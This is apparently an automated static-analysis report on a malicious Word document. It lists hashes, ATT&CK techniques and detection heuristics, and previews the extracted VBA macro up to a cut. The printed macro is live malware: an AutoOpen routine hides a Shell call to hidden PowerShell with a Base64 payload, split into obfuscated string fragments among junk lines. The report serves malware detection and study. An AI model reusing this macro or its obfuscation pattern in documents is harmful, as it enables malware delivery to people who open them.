Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8375e58c0ec308c…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 110.5 KB
Created: 2018-05-24 20:12:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: 4d10787d68abd71ef95f6bdf0c1d9283
SHA-1: 08d636ae290fe780e621993b5ea5ea624f8c106b
SHA-256: d8375e58c0ec308cee289748d20a35e6ec80c708d868e3731c3539487d46f47c
Risk score: 182

Malware Insights

MITRE ATT&CK

  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine, a common technique for executing code automatically when the document is opened. The macro uses the Shell() function to launch a PowerShell command, which is what triggered the critical-severity heuristic. The reconstructed PowerShell command is 'powershell -WindowStyle hidden -e IAAoACgAIgB7ADEAMwA3AH0AewA5AHsA DEAMwA3AH0AewAwAH0AewA4ADcAf' (the -e argument is a Base64-encoded script, truncated here), which is likely used to download and execute a second-stage payload.

Heuristics (6)

  • VBA macros detected (severity: medium; ID: OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical; ID: OLE_VBA_SHELL)
    Shell() call in VBA.
  • AutoOpen macro (severity: high; ID: OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (severity: high; ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; ID: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; ID: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17249 bytes
SHA-256: 868d0b019675579ddefc93edf58e6751a3deb9256dae1bacc613490d61801333

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CKOpklvcI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ciMtNJrrEDu()
On Error Resume Next
DlJNq = EbqWvl - Cos(zjEzj) * 1 - Chr(30763) / 4196 - ChrB(HVWBvD)
tTzJM = 75837
BBonVj = nDKVF - Cos(jDiCzf) * 1 - Chr(19634) / 92345 - ChrB(mMvZp)
XWlZTw = 65783
ciMtNJrrEDu = rnLTv + cWqivQb + JXFfllYfFk + TwYJfM + FPKVudD + FAMUX + NNBjKikbODS + UOVrDzq + zClITVzjTu + YErpwSIkhZW
LtuTq = RLjpc - Cos(qozKhd) * 1 - Chr(5771) / 71348 - ChrB(crwtb)
hZwlc = 1585
End Function
Sub Autoopen()
On Error Resume Next
TIFMU = wbjFzJ - Cos(jZarqv) * 1 - Chr(94435) / 76767 - ChrB(BzZOFk)
jDAfqV = 78350
RpIXIfjPWwm (ciMtNJrrEDu)
VJbmn = lwkjjH - Cos(EvjDMk) * 1 - Chr(13118) / 13761 - ChrB(FVNpwB)
iBOkUW = 64301
End Sub
Function RpIXIfjPWwm(PHjVdOh)
On Error Resume Next
KAmQz = fZcmiI - Cos(bdkhw) * 1 - Chr(65719) / 6839 - ChrB(ZzzjB)
hSXih = 26655
tLwqH = awkCRt - Cos(CXdCVo) * 1 - Chr(57469) / 26633 - ChrB(Dmjziz)
FIwuG = 65619
DzCsYZIciv = Shell(kFHwUKslcC + Chr(vbKeyP) + bBiQwPJnE + PHjVdOh, vbHide)
lrqkd = ouiqX - Cos(JoUIt) * 1 - Chr(69186) / 98327 - ChrB(IMKKO)
pfuUwX = 39456
End Function


Attribute VB_Name = "sLiEAEw"
Function rnLTv()
On Error Resume Next
hwlCot = HEEikC - Cos(cIvLiO) * 1 - Chr(18767) / 38154 - ChrB(LhhGar)
WuQsM = 92260
WSujT = "owersHeLL " + "-WinDow" + "sTyle hidden " + "-e IAAoACgAIg" + "B7ADEAM" + "gAyAH0AewA5AD" + "cAfQB7A" + "DEAMwA3AH0"
hRJDi = OfiNw - Cos(kbiiw) * 1 - Chr(43620) / 27219 - ChrB(ZVHmLQ)
hoUJVj = 7920
EZZKDSCCK = "AewAzAH0AewAx" + "ADAAOAB9AHsAM" + "wA5AH0AewAwAH0A" + "ewA4ADcAfQB" + "7ADEAMQA4AH0Aew" + "A5ADUAfQB7AD" + "EAMgA4AH0A" + "ewA0ADAAfQB7ADE" + "ANQB9AHsAM" + "gA2AH0AewA"
tZKbz = fwTHGG - Cos(sPRWww) * 1 - Chr(58231) / 24156 - ChrB(WsSYj)
ODdnjN = 71999
YdOOSK = "xADIAN" + "QB9AHsAMQ" + "AzAH0AewAxA" + "DEAMwB9AHsANA" + "A5AH0A" + "ewAyA" + "H0AewA"
ovOQu = nfEJM - Cos(ZDnXjZ) * 1 - Chr(1905) / 66416 - ChrB(RIaCo)
PiSZUG = 18628
AisJDS = "yADkAfQB7ADYAOA" + "B9AHsAOQAwAH0Ae" + "wA4ADgAfQ" + "B7ADEAMAA5AH0A" + "ewAxADA"
akjkpW = oIMqRL - Cos(FDGMC) * 1 - Chr(5057) / 43587 - ChrB(nNFmYB)
jriPaN = 74811
vhiDYLvp = "AMAB9AH" + "sAMQAy" + "ADYAfQB7" + "ADEAMQAxAH0" + "AewA4ADkAfQ" + "B7ADgANAB" + "9AHsA" + "MQA4AH"
pLMLd = OMWZzY - Cos(SIDHG) * 1 - Chr(76813) / 93694 - ChrB(fDwqC)
UICkC = 36442
RkHIvh = "0AewAxADAA" + "NQB9AHsAMQA5AH0" + "AewA1ADQAfQ" + "B7ADcAMQB9A" + "HsAMQA" + "yADMAfQB" + "7ADEAMwAyA" + "H0AewAyA" + "DMAfQB"
RBqqs = YAiNYc - Cos(QjiIU) * 1 - Chr(48893) / 81117 - ChrB(KHNVba)
DUozFO = 2913
OIjXTDrjA = "7ADQAMQB9AHsAN" + "AA4AH0AewA" + "0AH0AewAxAD" + "EANgB9AHsANAA0" + "AH0AewAy" + "ADAAfQB7ADQAMgB" + "9AHsAMQA" + "wADYAfQB" + "7ADQANwB9AHs" + "AOQAxA"
NQNBX = wqaNj - Cos(kduQd) * 1 - Chr(55324) / 32206 - ChrB(udVRL)
zOYaXH = 29203
lkjrjUFC = "H0AewAyADcAfQ" + "B7ADEAMQA5A" + "H0AewAx" + "ADIAMAB9AHsAN"
rnLTv = WSujT + EZZKDSCCK + YdOOSK + AisJDS + vhiDYLvp + RkHIvh + OIjXTDrjA + lkjrjUFC
End Function
Function cWqivQb()
On Error Resume Next
RsHYSR = QnIuS - Cos(aaXUc) * 1 - Chr(96216) / 89593 - ChrB(juvpt)
iRzqY = 87306
alMnwHkU = "gA2AH0AewA3ADk" + "AfQB7ADYAMA" + "B9AHsAMQAzA" + "DgAfQB7ADYA" + "fQB7ADgAMAB9A"
LCJEK = tdpMWt - Cos(WoBGu) * 1 - Chr(18242) / 39609 - ChrB(hzLiY)
fzoRWY = 1787
nTlfAaQPMn = "HsANgA3A" + "H0AewA3AD" + "cAfQB7" + "ADIAMQ" + "B9AHsAMQAzADYAf" + "QB7ADMAMA"
XOPSw = jtiYv - Cos(zuQsw) * 1 - Chr(29339) / 47703 - ChrB(dEzWlE)
dBuAV = 38641
mssXnPwnib = "B9AHsANwB9AHsAN" + "wAwAH0" + "AewAxADMANQB9" + "AHsAMQA0ADMAfQB"
QmrbL = foPnn - Cos(wkivV) * 1 - Chr(13386) / 99826 - ChrB(lTRtj)
nFsnYa = 8377
ttYjljDn = "7ADEANAAxAH0" + "AewA0ADMAfQB7" + "ADEANwB9AH" + "sANAA2AH0AewA2" + "ADQAfQB7ADEAMA" + "AxAH0A" + "ewAxADIANAB9AH" + "sAOAAzAH" + "0AewA5ADQ" + "AfQB7ADkAOQB9AH"
iiBUEF = ppJil - Cos(dvGZt) * 1 - Chr(40787) / 23225 - ChrB(wUzvQ)
avcPMw = 9641
... (truncated)